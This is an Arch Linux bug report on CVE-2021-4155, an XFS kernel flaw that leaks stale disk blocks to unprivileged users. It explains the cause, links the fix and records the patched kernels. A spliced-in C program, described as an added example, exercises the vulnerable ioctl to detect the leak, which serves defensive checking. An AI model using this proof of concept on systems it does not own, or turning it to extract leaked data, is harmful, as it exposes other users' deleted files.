Please read this before reporting a bug:
https://wiki.archlinux.org/title/Bug_reporting_guidelines
Do NOT report bugs when a package is just outdated, or it is in the AUR. Use the 'flag out of date' link on the package page, or the Mailing List.
REPEAT: Do NOT report bugs for outdated packages!
FS#73362 - (CVE-2021-4155) VUL-0: CVE-2021-4155: kernel-source: xfs: map unwritten blocks in XFS_IOC_{ALLOC,FRE
Attached to Project:
Community Packages
Opened by Nikolay (saber716rus) - Friday, 14 January 2022, 15:51 GMT
Last edited by Antonio Rojas (arojas) - Wednesday, 19 January 2022, 09:41 GMT
Details
A vulnerability has been discovered in the code of the XFS file system (CVE-2021-4155) that allows a local unprivileged user to read data from unused blocks directly from the block device. All major versions of the Linux kernel older than 5.16 that contain the XFS driver are affected by this problem. The fix is included in version 5.16, as well as in the stable updates 5.15.14, 5.10.91, 5.4.171, 4.19.225, etc. The status of updates fixing the problem in distributions can be tracked on these pages: Debian, RHEL, SUSE, Fedora, Ubuntu, Arch.
The vulnerability is caused by the incorrect behaviour of two XFS-specific ioctls, ioctl(XFS_IOC_ALLOCSP) and ioctl(XFS_IOC_FREESP), which are a functional analogue of the generic fallocate() system call. When increasing the size of a file that is not aligned to the block size, XFS_IOC_ALLOCSP/XFS_IOC_FREESP do not zero the tail bytes up to the next block boundary. Thus, on XFS with the standard block size of 4096 bytes, an attacker can read 4095 bytes of previously written data from each block. These areas may contain data from deleted files or defragmented files, as well as data from files with deduplicated blocks. You can check your system for the problem using a simple prototype exploit. If, after executing the proposed sequence of commands, it is possible to read the text of Shakespeare, then the FS driver is vulnerable. The initial mounting of the XFS partition for the demonstration requires superuser rights. Since ioctl(XFS_IOC_ALLOCSP) and ioctl(XFS_IOC_FREESP) are practically identical in functionality to the standard fallocate(), and their only difference is the data leak, their presence is similar to a backdoor. Despite the general policy of not changing existing interfaces in the kernel, at Linus' suggestion it was decided to remove these ioctls completely in the next version.
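The check the report describes, written out as an added example: this is not code from the bug report, the kernel tree or the linked prototype exploit. It creates a scratch file on an XFS mount, writes a one-byte seed, grows the file with XFS_IOC_ALLOCSP and counts non-zero bytes past the seed, which on a fixed kernel must be zero. The struct and the ioctl number are copied from the kernel's fs/xfs/libxfs/xfs_fs.h so the program builds without xfsprogs headers; it assumes a Linux build environment and a writable path on an XFS mount. The names allocsp_check, count_nonzero and tail_to_boundary are this example's own. Two caveats: on a kernel where the ioctl has already been removed the call fails with ENOTTY and the program reports that rather than a leak, and on a freshly made filesystem that never held other data the grown region may legitimately read as zeros, so an "all zero" result there says nothing about the kernel.

```c
/* Added example, not from the bug report or the kernel tree.
 * Build: cc -O2 -o allocsp_check allocsp_check.c
 * Run:   ./allocsp_check /path/on/xfs/mount/scratchfile   (no root needed) */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/vfs.h>
#include <unistd.h>

/* Copied from the kernel's fs/xfs/libxfs/xfs_fs.h so no xfsprogs headers are needed. */
struct xfs_flock64 {
    int16_t  l_type;
    int16_t  l_whence;
    int64_t  l_start;   /* for ALLOCSP: the new end of file */
    int64_t  l_len;     /* ignored by ALLOCSP */
    int32_t  l_sysid;
    uint32_t l_pid;
    int32_t  l_pad[4];
};
#define XFS_IOC_ALLOCSP _IOW('X', 10, struct xfs_flock64)
#define XFS_SB_MAGIC    0x58465342UL   /* "XFSB": statfs() f_type of an XFS mount */

enum verdict { STALE_DATA, ALL_ZERO, IOCTL_ABSENT, NOT_XFS, FAILED };

/* Bytes from `size` up to the next `blksz` boundary: the window the report says
 * is exposed, 4095 for a 1-byte file on 4096-byte blocks. */
size_t tail_to_boundary(size_t size, size_t blksz)
{
    return (blksz - size % blksz) % blksz;
}

/* Non-zero bytes in buf[from, len). Everything past the seed should be zero. */
size_t count_nonzero(const unsigned char *buf, size_t len, size_t from)
{
    size_t n = 0;
    for (size_t i = from; i < len; i++)
        n += buf[i] != 0;
    return n;
}

/* Create a scratch file at `path` (hypothetical path supplied by the caller),
 * write `seed` bytes of 'A', grow it to `grow_to` bytes with XFS_IOC_ALLOCSP,
 * read it back and count non-zero bytes past the seed. The file is removed. */
enum verdict allocsp_check(const char *path, size_t seed, size_t grow_to, size_t *stale)
{
    struct statfs sfs;
    struct xfs_flock64 fl = { .l_whence = SEEK_SET, .l_start = (int64_t)grow_to };
    enum verdict v = FAILED;
    unsigned char *buf, *fill;
    int fd;

    *stale = 0;
    if (seed == 0 || seed >= grow_to)
        return FAILED;
    buf = calloc(grow_to, 1);
    fill = malloc(seed);
    fd = open(path, O_RDWR | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || !buf || !fill || fstatfs(fd, &sfs) != 0)
        goto out;
    if ((unsigned long)sfs.f_type != XFS_SB_MAGIC) {
        v = NOT_XFS;
        goto out;
    }
    memset(fill, 'A', seed);
    if (pwrite(fd, fill, seed, 0) != (ssize_t)seed)
        goto out;
    if (ioctl(fd, XFS_IOC_ALLOCSP, &fl) != 0) {
        /* ENOTTY: this kernel no longer implements the ioctl at all. */
        v = errno == ENOTTY ? IOCTL_ABSENT : FAILED;
        goto out;
    }
    /* Flush and drop the page cache so the read reflects on-disk contents. */
    fsync(fd);
    posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED);
    if (pread(fd, buf, grow_to, 0) != (ssize_t)grow_to)
        goto out;
    *stale = count_nonzero(buf, grow_to, seed);
    v = *stale ? STALE_DATA : ALL_ZERO;
out:
    if (fd >= 0) {
        close(fd);
        unlink(path);
    }
    free(buf);
    free(fill);
    return v;
}

int main(int argc, char **argv)
{
    static const char *names[] = {
        "STALE DATA READABLE (vulnerable)", "all zero (not vulnerable, or nothing stale on disk)",
        "ioctl absent (not vulnerable)", "not an XFS filesystem", "check failed" };
    size_t stale = 0;
    if (argc != 2) {
        fprintf(stderr, "usage: %s /path/on/xfs/mount/scratchfile\n", argv[0]);
        return 2;
    }
    /* 1-byte seed grown to 64 KiB: per the report up to 4095 stale bytes per 4 KiB block. */
    enum verdict v = allocsp_check(argv[1], 1, 64 * 1024, &stale);
    printf("%s: %zu non-zero bytes past the seed\n", names[v], stale);
    return v == STALE_DATA ? 1 : 0;
}
```

Run it as an ordinary user with a path on the XFS mount you want to check; it exits 1 only when non-zero bytes were read back past the seed. Because O_EXCL is used, the scratch file must not already exist.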
Closed by Antonio Rojas (arojas)
Wednesday, 19 January 2022, 09:41 GMT
Reason for closing: Fixed
Additional comments about closing: linux 5.16.arch1-1 linux-zen 5.16.zen1-1 linux-lts 5.15.14-1 linux-hardened 5.15.14.hardened1-1
Comment by Nikolay (saber716rus) -
Friday, 14 January 2022, 15:54 GMT
Patch fixing the vulnerability: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=983d8e60f50806f90534cc5373d0ce867e5aaf79
Comment by George Rawlinson (rawlinsong) -
Monday, 17 January 2022, 20:09 GMT
@heftig & dvzrv: Not sure who to assign this to, feel free to re-assign to the correct person(s).